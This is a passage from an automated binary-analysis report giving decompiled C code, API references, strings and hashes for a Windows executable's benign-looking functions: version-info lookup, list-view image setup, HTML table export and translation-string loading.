0x0040df79
0x0040df8e
0x0040dfa3
0x0040dfb8
0x0040dfbf
0x0040dfc0
0x0040dfc1
0x0040dfc7
0x0040dfcc

APIs

GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
??2@YAPAXI@Z.MSVCRT ref: 0040DE67
GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
_snwprintf.MSVCRT ref: 0040DEE7
wcscpy.MSVCRT ref: 0040DF11
??3@YAXPAX@Z.MSVCRT ref: 0040DFC1

Strings

InternalName, xrefs: 0040DF7E
OriginalFileName, xrefs: 0040DFA8
040904E4, xrefs: 0040DF0B
CompanyName, xrefs: 0040DF69
FileDescription, xrefs: 0040DF2A
FileVersion, xrefs: 0040DF3F
ProductVersion, xrefs: 0040DF54
LegalCopyright, xrefs: 0040DF93
\VarFileInfo\Translation, xrefs: 0040DEC1
%4.4X%4.4X, xrefs: 0040DEDC
ProductName, xrefs: 0040DF18

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 1223191525-1542517562
Opcode ID: 69e7b3d26914ff66313ef8682ccc4f82ae7b5cc4bcfe3f2ebefc357c3cedf984
Instruction ID: 259d72124e724de92b6e9870ccb5e43e5a0f9d392629a35824c20b6fa1ecb0e7
Opcode Fuzzy Hash: 69e7b3d26914ff66313ef8682ccc4f82ae7b5cc4bcfe3f2ebefc357c3cedf984
Instruction Fuzzy Hash: FB4135B2900219BEC704EBE5DC41DDEB7BCAF48304F504567B505B3181DB78AA99CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 004099C4, Relevance: 33.1, APIs: 22, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004099C4(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2c0)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2c8)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2b4) = _t48;
						__imp__ImageList_SetImageCount(_t48, 1);
						_push( *(_t62 + 0x2b4));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2b4) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2ac), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2c4)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2b8) = _t46;
					__imp__ImageList_SetImageCount(_t46, 1);
					SendMessageW( *(_t62 + 0x2ac), 0x1003, 0,  *(_t62 + 0x2b8));
				}
				 *(_t62 + 0x2b0) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2b0), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2b0), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2b0), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E00402986( *(_t62 + 0x2ac)), 0x1208, 0,  *(_t62 + 0x2b0));
			}

0x004099cc
0x004099d3
0x004099e4
0x004099f0
0x00409a65
0x00409a6a
0x00409a70
0x00409a76
0x004099f2
0x00409a00
0x00409a07
0x00409a17
0x00409a1c
0x00409a2e
0x00409a4c
0x00409a52
0x00409a58
0x00409a58
0x00409a89
0x00409a89
0x00409a91
0x00409a9d
0x00409aa2
0x00409aa8
0x00409ac0
0x00409ac0
0x00409ad5
0x00409af4
0x00409b0a
0x00409b17
0x00409b1b
0x00409b23
0x00409b34
0x00409b3e
0x00409b4e
0x00409b5a
0x00409b60
0x00409b89

APIs

memset.MSVCRT ref: 00409A07
memset.MSVCRT ref: 00409A1C
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A2E
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00409A4C
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409A65
ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409A70
SendMessageW.USER32(?,00001003,00000001,?), ref: 00409A89
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409A9D
ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409AA8
SendMessageW.USER32(?,00001003,00000000,?), ref: 00409AC0
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409ACC
GetModuleHandleW.KERNEL32(00000000), ref: 00409ADB
LoadImageW.USER32 ref: 00409AED
GetModuleHandleW.KERNEL32(00000000), ref: 00409AF8
LoadImageW.USER32 ref: 00409B0A
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409B1B
GetSysColor.USER32(0000000F), ref: 00409B23
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00409B3E
ImageList_AddMasked.COMCTL32(?,?,?), ref: 00409B4E
DeleteObject.GDI32(?), ref: 00409B5A
DeleteObject.GDI32(?), ref: 00409B60
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00409B7D

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
Instruction ID: 6a740ff22d918b1f3da30253e66a4340b4722f468affa3cdbe00c11f6054e755
Opcode Fuzzy Hash: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
Instruction Fuzzy Hash: 4C419271641304BFE730AFA0DD8AF9B77A8FB48700F000839F795A51D2C7B6A8449B29

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC79, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040DC79(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040DFD6();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040DBA9(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040DFD6();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}

0x0040dc79
0x0040dc94
0x0040dc9b
0x0040dca9
0x0040dcb0
0x0040dcb5
0x0040dcbc
0x0040dcc3
0x0040dcca
0x0040dcca
0x0040dcd0
0x0040dcd3
0x0040dcd6
0x0040dce2
0x0040dce7
0x0040dcee
0x0040dcf0
0x0040dcf1
0x0040dcfc
0x0040dd01
0x0040dd02
0x0040dd0f
0x0040dd14
0x0040dd14
0x0040dd17
0x0040dd1d
0x0040dd2c
0x0040dd2d
0x0040dd38
0x0040dd3d
0x0040dd3e
0x0040dd4b
0x0040dd50
0x0040dd59
0x0040dd5f
0x0040dd63
0x0040dd6b
0x0040dd71
0x0040dd76
0x0040dd80
0x0040dd88
0x0040dd8e
0x0040dd92
0x0040dd9a
0x0040dda0
0x0040dda6

APIs

memset.MSVCRT ref: 0040DC9B
memset.MSVCRT ref: 0040DCB0
wcscpy.MSVCRT ref: 0040DCE2
_snwprintf.MSVCRT ref: 0040DD02
wcscat.MSVCRT ref: 0040DD0F
_snwprintf.MSVCRT ref: 0040DD3E
wcscat.MSVCRT ref: 0040DD4B
wcscat.MSVCRT ref: 0040DD59
wcscat.MSVCRT ref: 0040DD6B
wcscat.MSVCRT ref: 0040DD76
wcscat.MSVCRT ref: 0040DD88
wcscat.MSVCRT ref: 0040DD9A

Strings

</font>, xrefs: 0040DD94
size="%d", xrefs: 0040DCF1
<font, xrefs: 0040DCDC
<b>, xrefs: 0040DD65
</b>, xrefs: 0040DD82
color="#%s", xrefs: 0040DD2D

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: c4fff774561d85038a746beef6b637ea5cd86bb203755f0cf655f19ed33be2ac
Instruction ID: c1522ee0e6335da557e9dda04135524704fc8f14ed906b709f088109683ecb65
Opcode Fuzzy Hash: c4fff774561d85038a746beef6b637ea5cd86bb203755f0cf655f19ed33be2ac
Instruction Fuzzy Hash: 213184B2D04306AEE720AA959C82A6B73B99F44714F10817FF215B21C2DB7859889A18

Uniqueness

Uniqueness Score: -1.00%

Function 00408C24, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00408C24(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed short* _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t151;
				intOrPtr* _t152;
				signed int _t154;
				signed int _t155;
				void* _t157;
				void* _t159;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t151 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t159 = _t157 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_t128 =  *((intOrPtr*)(__ebx + 0x2e4));
				_v16 =  *((intOrPtr*)(__ebx + 0x2e4));
				if(_t87 != 0xffffffff) {
					_t128 =  &_v964;
					_push(E0040DBA9(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040DFD6();
					_t159 = _t159 + 0x18;
				}
				E00408857(_t124, _t128, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t151;
				if( *((intOrPtr*)(_t124 + 0x34)) > _t151) {
					while(1) {
						_t154 =  *( *((intOrPtr*)(_t124 + 0x38)) + _v8 * 4);
						_v12 = _t154;
						_t155 = _t154 * 0x14;
						if( *((intOrPtr*)(_t155 +  *((intOrPtr*)(_t124 + 0x48)) + 8)) != _t151) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t151;
						_t152 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t152,  &_v32);
						E0040DBA9(_v32,  &_v348);
						E0040DBDA( *((intOrPtr*)( *_t152))(_v12,  *((intOrPtr*)(_t124 + 0x68))),  *(_t124 + 0x6c));
						 *((intOrPtr*)( *_t124 + 0x54))( *(_t124 + 0x6c), _t152, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x70),  *(_t155 + _v16 + 0x10));
						} else {
							_push( *(_t155 + _v16 + 0x10));
							_push(E0040DBA9(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x70));
							L0040DFD6();
							_t159 = _t159 + 0x14;
						}
						_t109 =  *(_t124 + 0x6c);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
							_pop(_t128);
						}
						E0040DC79( &_v32,  *((intOrPtr*)(_t124 + 0x74)),  *(_t124 + 0x6c));
						_push( *((intOrPtr*)(_t124 + 0x74)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x70));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x68)));
						L0040DFD6();
						_t159 = _t159 + 0x28;
						E00408857(_t124, _t128, _a4,  *((intOrPtr*)(_t124 + 0x68)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x34))) {
							goto L14;
						}
						_t151 = 0;
					}
				}
				L14:
				E00408857(_t124, _t128, _a4, L"</table><p>");
				return E00408857(_t124, _t128, _a4, L"\r\n");
			}

0x00408c24
0x00408c2d
0x00408c45
0x00408c4c
0x00408c58
0x00408c5a
0x00408c5c
0x00408c68
0x00408c6f
0x00408c7e
0x00408c85
0x00408c94
0x00408c9b
0x00408ca2
0x00408ca7
0x00408cad
0x00408cb3
0x00408cb6
0x00408cb8
0x00408cc5
0x00408cc6
0x00408cd1
0x00408cd3
0x00408cd4
0x00408cd9
0x00408cd9
0x00408ce6
0x00408cee
0x00408cf1
0x00408cfb
0x00408d01
0x00408d07
0x00408d0a
0x00408d11
0x00408d1f
0x00408d25
0x00408d28
0x00408d2c
0x00408d30
0x00408d38
0x00408d3b
0x00408d46
0x00408d53
0x00408d69
0x00408d79
0x00408d86
0x00408dc0
0x00408d88
0x00408d8b
0x00408d9e
0x00408d9f
0x00408da4
0x00408da9
0x00408dac
0x00408db1
0x00408db1
0x00408dc7
0x00408dca
0x00408dd0
0x00408dde
0x00408de4
0x00408de4
0x00408dee
0x00408df3
0x00408dfc
0x00408e03
0x00408e04
0x00408e0d
0x00408e14
0x00408e15
0x00408e1a
0x00408e1d
0x00408e22
0x00408e2d
0x00408e32
0x00408e3b
0x00000000
0x00000000
0x00408cf9
0x00408cf9
0x00408cfb
0x00408e41
0x00408e4b
0x00408e62

APIs

memset.MSVCRT ref: 00408C45
memset.MSVCRT ref: 00408C6F
memset.MSVCRT ref: 00408C85
memset.MSVCRT ref: 00408C9B
_snwprintf.MSVCRT ref: 00408CD4
wcscpy.MSVCRT ref: 00408D1F
_snwprintf.MSVCRT ref: 00408DAC
wcscat.MSVCRT ref: 00408DDE

Part of subcall function 0040DBA9: _snwprintf.MSVCRT ref: 0040DBCD

wcscpy.MSVCRT ref: 00408DC0
_snwprintf.MSVCRT ref: 00408E1D

Strings

<table border="1" cellpadding="5">, xrefs: 00408CDC
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 00408C4D
</table><p>, xrefs: 00408E41
<font color="%s">%s</font>, xrefs: 00408D9F
bgcolor="%s", xrefs: 00408CC6
 , xrefs: 00408DD8
nowrap, xrefs: 00408D19

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1607361635-601624466
Opcode ID: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
Instruction ID: a67fbf1fc49fec725baa5abd822cc1541e9ed8d2f41859f279ded4865cedaa1f
Opcode Fuzzy Hash: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
Instruction Fuzzy Hash: E261AC31900208AFDF24AF55CC85EAA7B79FF44310F1045BAF805BA2D2DB75AA45DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409190, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00409190(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				_t75 = __ecx;
				E0040E340(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040DBA9(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040DFD6();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040DBA9(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040DFD6();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040DFD6();
				_t80 = _t79 + 0x10;
				E00408857(_a4, _t75, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040DFD6();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040DFD6();
						_t80 = _t81 + 0x1c;
						_t61 = E00408857(_a4, _t75, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}

0x00409190
0x00409198
0x004091af
0x004091b6
0x004091c4
0x004091cb
0x004091d9
0x004091e0
0x004091e5
0x004091ec
0x004091fd
0x004091fe
0x00409209
0x0040920e
0x0040920f
0x00409214
0x00409214
0x0040921b
0x0040922c
0x0040922d
0x00409238
0x0040923d
0x0040923e
0x0040924f
0x00409254
0x00409254
0x0040925d
0x0040925e
0x00409269
0x0040926e
0x0040926f
0x00409274
0x00409284
0x00409289
0x0040928e
0x00409298
0x0040929b
0x0040929e
0x004092a7
0x004092ae
0x004092b3
0x004092b5
0x004092bb
0x004092d9
0x004092bd
0x004092bd
0x004092be
0x004092c9
0x004092ce
0x004092cf
0x004092d4
0x004092d4
0x004092e6
0x004092e7
0x004092f0
0x004092f7
0x004092f8
0x00409303
0x00409308
0x00409309
0x0040930e
0x0040931e
0x00409323
0x00409326
0x00409326
0x00409326
0x00000000
0x0040932f
0x00409333

APIs

memset.MSVCRT ref: 004091B6
memset.MSVCRT ref: 004091CB
memset.MSVCRT ref: 004091E0
_snwprintf.MSVCRT ref: 0040920F
_snwprintf.MSVCRT ref: 0040923E
wcscpy.MSVCRT ref: 0040924F
_snwprintf.MSVCRT ref: 0040926F
memset.MSVCRT ref: 004092AE
_snwprintf.MSVCRT ref: 004092CF
_snwprintf.MSVCRT ref: 00409309

Part of subcall function 0040DBA9: _snwprintf.MSVCRT ref: 0040DBCD

Strings

width="%s", xrefs: 004092BE
<th%s>%s%s%s, xrefs: 004092F8
</font>, xrefs: 00409249
bgcolor="%s", xrefs: 004091FE
<table border="1" cellpadding="5"><tr%s>, xrefs: 0040925E
<font color="%s">, xrefs: 0040922D

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
Instruction ID: a3c2da3f9a4e1dbf7e2b2d72e589ec7db7b3c133e798fc967c269c0974e8c497
Opcode Fuzzy Hash: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
Instruction Fuzzy Hash: DD41527194021A6AEB20EE55CC41FEA737CFF45304F4444BAF909F2192E7789A548FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00407297, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00407297(void* __ecx, void* __eflags, char _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040E340(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00405800( &_v532);
				_pop(_t44);
				E0040674D( &_v5164);
				_t27 = E0040DE36( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x412c38, _a8);
				wcscpy(0x412e48, L"general");
				E00406DE5(_t61, L"TranslatorName", 0x40f454, 0);
				E00406DE5(_t61, L"TranslatorURL", 0x40f454, 0);
				E00406DE5(_t61, L"Version",  &_v1044, 1);
				E00406DE5(_t61, L"RTL", "0", 0);
				_t13 =  &_a4; // 0x40743b
				EnumResourceNamesW( *_t13, 4, E00407047, 0);
				_t14 =  &_a4; // 0x40743b
				EnumResourceNamesW( *_t14, 5, E00407047, 0);
				wcscpy(0x412e48, L"strings");
				_t38 = E00407170(_t44, _t61, _a4);
				 *0x412c38 =  *0x412c38 & 0x00000000;
				return _t38;
			}

0x0040729f
0x004072b6
0x004072bd
0x004072d2
0x004072d9
0x004072e8
0x004072ed
0x004072f4
0x00407306
0x0040730b
0x0040730d
0x0040731d
0x00407323
0x00407323
0x0040732c
0x0040733c
0x0040734d
0x0040735e
0x00407374
0x00407387
0x0040739e
0x004073a1
0x004073a8
0x004073ab
0x004073b3
0x004073bb
0x004073c3
0x004073cf

APIs

memset.MSVCRT ref: 004072BD
memset.MSVCRT ref: 004072D9

Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B

Part of subcall function 0040DE36: GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
Part of subcall function 0040DE36: ??2@YAPAXI@Z.MSVCRT ref: 0040DE67
Part of subcall function 0040DE36: GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
Part of subcall function 0040DE36: _snwprintf.MSVCRT ref: 0040DEE7
Part of subcall function 0040DE36: wcscpy.MSVCRT ref: 0040DF11

wcscpy.MSVCRT ref: 0040731D
wcscpy.MSVCRT ref: 0040732C
wcscpy.MSVCRT ref: 0040733C
EnumResourceNamesW.KERNEL32(;t@,00000004,00407047,00000000), ref: 004073A1
EnumResourceNamesW.KERNEL32(?,00000005,00407047,00000000), ref: 004073AB
wcscpy.MSVCRT ref: 004073B3

Strings

TranslatorURL, xrefs: 00407359
;t@, xrefs: 0040739E, 004073A8
Version, xrefs: 0040736F
RTL, xrefs: 00407382
TranslatorName, xrefs: 00407348
general, xrefs: 00407331
H.A, xrefs: 00407336
strings, xrefs: 004073AD

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
String ID: ;t@$H.A$RTL$TranslatorName$TranslatorURL$Version$general$strings
API String ID: 3037099051-2223684028
Opcode ID: 74f5d95449f09ce166c542c29ae1e94b567f2845415856ce548fabdb3abc4f89
Instruction ID: 5f8ecd76274f380d0de7cb04729dc73bacf1b7add2d1f3ba80cfb94e375ef893
Opcode Fuzzy Hash: 74f5d95449f09ce166c542c29ae1e94b567f2845415856ce548fabdb3abc4f89
Instruction Fuzzy Hash: 27217872A4021875C730B7529C46FCF3B6CDF44758F14047BB90CB60D2E6F96A988AAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040B813, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 190
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040B813(intOrPtr __ecx, intOrPtr _a4, short _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				void* _t60;
				intOrPtr _t64;
				intOrPtr _t66;
